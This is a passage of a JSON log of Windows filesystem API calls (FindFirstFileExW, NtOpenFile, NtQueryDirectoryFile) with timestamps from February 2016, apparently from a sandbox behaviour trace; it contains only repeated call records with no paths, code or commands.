"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,137", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,257", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,267", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,277", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,307", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,317", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,337", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,347", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,377", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": 